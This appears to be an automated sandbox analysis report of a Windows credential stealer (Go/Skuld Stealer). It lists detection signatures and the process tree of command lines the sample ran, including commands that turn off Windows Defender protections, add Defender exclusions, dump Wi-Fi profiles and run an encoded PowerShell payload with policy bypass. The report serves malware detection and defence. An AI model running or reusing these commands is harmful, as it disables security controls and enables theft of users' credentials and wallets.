Edit tour
Windows
Analysis Report
WdlA0C4PkO.exe
Overview
General Information
Sample name: | WdlA0C4PkO.exerenamed because original name is a hash value |
Original sample name: | 2b344d8644f0d502c4c8370ef8674a51.exe |
Analysis ID: | 1577903 |
MD5: | 2b344d8644f0d502c4c8370ef8674a51 |
SHA1: | d14f20eaf8ea75d6f10c85e2b18fb1d0ee8781da |
SHA256: | bc1b77f9680b9028efd499e3e741d46db003f5470a8b61d21e445eaeb7141045 |
Tags: | exeuser-abuse_ch |
Infos: | |
Detection
Go Stealer, Skuld Stealer
Score: | 100 |
Range: | 0 - 100 |
Whitelisted: | false |
Confidence: | 100% |
Signatures
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Sigma detected: Capture Wi-Fi password
Yara detected Go Stealer
Yara detected Skuld Stealer
AI detected suspicious sample
Adds a directory exclusion to Windows Defender
Bypasses PowerShell execution policy
Check if machine is in data center or colocation facility
Encrypted powershell cmdline option found
Found many strings related to Crypto-Wallets (likely being stolen)
Installs new ROOT certificates
Loading BitLocker PowerShell Module
Machine Learning detection for dropped file
Machine Learning detection for sample
Modifies Windows Defender protection settings
Modifies the hosts file
Sigma detected: Dot net compiler compiles file from suspicious location
Sigma detected: Files With System Process Name In Unsuspected Locations
Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
Sigma detected: Powershell Defender Disable Scan Feature
Sigma detected: Suspicious Encoded PowerShell Command Line
Sigma detected: Suspicious PowerShell Encoded Command Patterns
Tries to delay execution (extensive OutputDebugStringW loop)
Tries to harvest and steal WLAN passwords
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Crypto Currency Wallets
Tries to steal communication platform credentials (via file / registry access)
Uses cmd line tools excessively to alter registry or file data
Uses netsh to modify the Windows network and firewall settings
Abnormal high CPU Usage
Compiles C# or VB.Net code
Contains capabilities to detect virtual machines
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates or modifies windows services
Drops PE files
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
IP address seen in connection with other malware
May check the online IP address of the machine
May sleep (evasive loops) to hinder dynamic analysis
PE file contains sections with non-standard names
Queries sensitive Operating System Information (via WMI, Win32_ComputerSystem, often done to detect virtual machines)
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Searches for user specific document files
Sigma detected: Change PowerShell Policies to an Insecure Level
Sigma detected: CurrentVersion Autorun Keys Modification
Sigma detected: Dynamic .NET Compilation Via Csc.EXE
Sigma detected: Powershell Defender Exclusion
Sigma detected: Suspicious Execution of Powershell with Base64
Stores large binary data to the registry
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Very long command line found
Yara detected Credential Stealer
Classification
- System is w10x64
- WdlA0C4PkO.exe (PID: 7648 cmdline:
"C:\Users\ user\Deskt op\WdlA0C4 PkO.exe" MD5: 2B344D8644F0D502C4C8370EF8674A51) - conhost.exe (PID: 7656 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 0D698AF330FD17BEE3BF90011D49251D) - attrib.exe (PID: 7752 cmdline:
attrib +h +s C:\User s\user\Des ktop\WdlA0 C4PkO.exe MD5: 5037D8E6670EF1D89FB6AD435F12A9FD) - attrib.exe (PID: 7772 cmdline:
attrib +h +s C:\User s\user\App Data\Roami ng\Microso ft\Protect \SecurityH ealthSystr ay.exe MD5: 5037D8E6670EF1D89FB6AD435F12A9FD) - WMIC.exe (PID: 7828 cmdline:
wmic cspro duct get U UID MD5: C37F2F4F4B3CD128BDABCAEB2266A785) - WMIC.exe (PID: 7896 cmdline:
wmic path win32_Vide oControlle r get name MD5: C37F2F4F4B3CD128BDABCAEB2266A785) - powershell.exe (PID: 7940 cmdline:
powershell -Command Add-MpPref erence -Ex clusionPat h C:\Users \user\Desk top\WdlA0C 4PkO.exe MD5: 04029E121A0CFA5991749937DD22A1D9) - WMIC.exe (PID: 7964 cmdline:
wmic os ge t Caption MD5: C37F2F4F4B3CD128BDABCAEB2266A785) - WMIC.exe (PID: 8072 cmdline:
wmic cpu g et Name MD5: C37F2F4F4B3CD128BDABCAEB2266A785) - WMIC.exe (PID: 8156 cmdline:
wmic path win32_Vide oControlle r get name MD5: C37F2F4F4B3CD128BDABCAEB2266A785) - powershell.exe (PID: 7332 cmdline:
powershell Set-MpPre ference -D isableIntr usionPreve ntionSyste m $true -D isableIOAV Protection $true -Di sableRealt imeMonitor ing $true -DisableSc riptScanni ng $true - EnableCont rolledFold erAccess D isabled -E nableNetwo rkProtecti on AuditMo de -Force -MAPSRepor ting Disab led -Submi tSamplesCo nsent Neve rSend MD5: 04029E121A0CFA5991749937DD22A1D9) - WMIC.exe (PID: 6684 cmdline:
wmic cspro duct get U UID MD5: C37F2F4F4B3CD128BDABCAEB2266A785) - netsh.exe (PID: 7496 cmdline:
netsh wlan show prof iles MD5: 6F1E6DD688818BC3D1391D0CC7D597EB) - powershell.exe (PID: 7668 cmdline:
powershell .exe -NoPr ofile -Exe cutionPoli cy Bypass -EncodedCo mmand JABz AG8AdQByAG MAZQAgAD0A IABAACIADQ AKAHUAcwBp AG4AZwAgAF MAeQBzAHQA ZQBtADsADQ AKAHUAcwBp AG4AZwAgAF MAeQBzAHQA ZQBtAC4AQw BvAGwAbABl AGMAdABpAG 8AbgBzAC4A RwBlAG4AZQ ByAGkAYwA7 AA0ACgB1AH MAaQBuAGcA IABTAHkAcw B0AGUAbQAu AEQAcgBhAH cAaQBuAGcA OwANAAoAdQ BzAGkAbgBn ACAAUwB5AH MAdABlAG0A LgBXAGkAbg BkAG8AdwBz AC4ARgBvAH IAbQBzADsA DQAKAA0ACg BwAHUAYgBs AGkAYwAgAG MAbABhAHMA cwAgAFMAYw ByAGUAZQBu AHMAaABvAH QADQAKAHsA DQAKACAAIA AgACAAcAB1 AGIAbABpAG MAIABzAHQA YQB0AGkAYw AgAEwAaQBz AHQAPABCAG kAdABtAGEA cAA+ACAAQw BhAHAAdAB1 AHIAZQBTAG MAcgBlAGUA bgBzACgAKQ ANAAoAIAAg ACAAIAB7AA 0ACgAgACAA IAAgACAAIA AgACAAdgBh AHIAIAByAG UAcwB1AGwA dABzACAAPQ AgAG4AZQB3 ACAATABpAH MAdAA8AEIA aQB0AG0AYQ BwAD4AKAAp ADsADQAKAC AAIAAgACAA IAAgACAAIA B2AGEAcgAg AGEAbABsAF MAYwByAGUA ZQBuAHMAIA A9ACAAUwBj AHIAZQBlAG 4ALgBBAGwA bABTAGMAcg BlAGUAbgBz ADsADQAKAA 0ACgAgACAA IAAgACAAIA AgACAAZgBv AHIAZQBhAG MAaAAgACgA UwBjAHIAZQ BlAG4AIABz AGMAcgBlAG UAbgAgAGkA bgAgAGEAbA BsAFMAYwBy AGUAZQBuAH MAKQANAAoA IAAgACAAIA AgACAAIAAg AHsADQAKAC AAIAAgACAA IAAgACAAIA AgACAAIAAg AHQAcgB5AA 0ACgAgACAA IAAgACAAIA AgACAAIAAg ACAAIAB7AA 0ACgAgACAA IAAgACAAIA AgACAAIAAg ACAAIAAgAC AAIAAgAFIA ZQBjAHQAYQ BuAGcAbABl ACAAYgBvAH UAbgBkAHMA IAA9ACAAcw BjAHIAZQBl AG4ALgBCAG 8AdQBuAGQA cwA7AA0ACg AgACAAIAAg ACAAIAAgAC AAIAAgACAA IAAgACAAIA AgAHUAcwBp AG4AZwAgAC gAQgBpAHQA bQBhAHAAIA BiAGkAdABt AGEAcAAgAD 0AIABuAGUA dwAgAEIAaQ B0AG0AYQBw ACgAYgBvAH UAbgBkAHMA LgBXAGkAZA B0AGgALAAg AGIAbwB1AG 4AZABzAC4A SABlAGkAZw BoAHQAKQAp AA0ACgAgAC AAIAAgACAA IAAgACAAIA AgACAAIAAg ACAAIAAgAH sADQAKACAA IAAgACAAIA AgACAAIAAg ACAAIAAgAC AAIAAgACAA IAAgACAAIA B1AHMAaQBu AGcAIAAoAE cAcgBhAHAA aABpAGMAcw AgAGcAcgBh AHAAaABpAG MAcwAgAD0A IABHAHIAYQ BwAGgAaQBj AHMALgBGAH IAbwBtAEkA bQBhAGcAZQ AoAGIAaQB0 AG0AYQBwAC kAKQANAAoA IAAgACAAIA AgACAAIAAg ACAAIAAgAC AAIAAgACAA IAAgACAAIA AgAHsADQAK ACAAIAAgAC AAIAAgACAA IAAgACAAIA AgACAAIAAg ACAAIAAgAC AAIAAgACAA IAAgAGcAcg BhAHAAaABp AGMAcwAuAE MAbwBwAHkA RgByAG8AbQ BTAGMAcgBl AGUAbgAoAG 4AZQB3ACAA UABvAGkAbg B0ACgAYgBv AHUAbgBkAH MALgBMAGUA ZgB0ACwAIA BiAG8AdQBu AGQAcwAuAF QAbwBwACkA LAAgAFAAbw BpAG4AdAAu AEUAbQBwAH QAeQAsACAA YgBvAHUAbg BkAHMALgBT AGkAegBlAC kAOwANAAoA IAAgACAAIA AgACAAIAAg ACAAIAAgAC AAIAAgACAA IAAgACAAIA AgAH0ADQAK AA0ACgAgAC AAIAAgACAA IAAgACAAIA AgACAAIAAg ACAAIAAgAC AAIAAgACAA cgBlAHMAdQ BsAHQAcwAu AEEAZABkAC gAKABCAGkA dABtAGEAcA ApAGIAaQB0 AG0AYQBwAC 4AQwBsAG8A bgBlACgAKQ ApADsADQAK ACAAIAAgAC AAIAAgACAA IAAgACAAIA AgACAAIAAg ACAAfQANAA oAIAAgACAA IAAgACAAIA AgACAAIAAg ACAAfQANAA oAIAAgACAA IAAgACAAIA AgACAAIAAg ACAAYwBhAH QAYwBoACAA KABFAHgAYw BlAHAAdABp AG8AbgApAA 0ACgAgACAA IAAgACAAIA AgACAAIAAg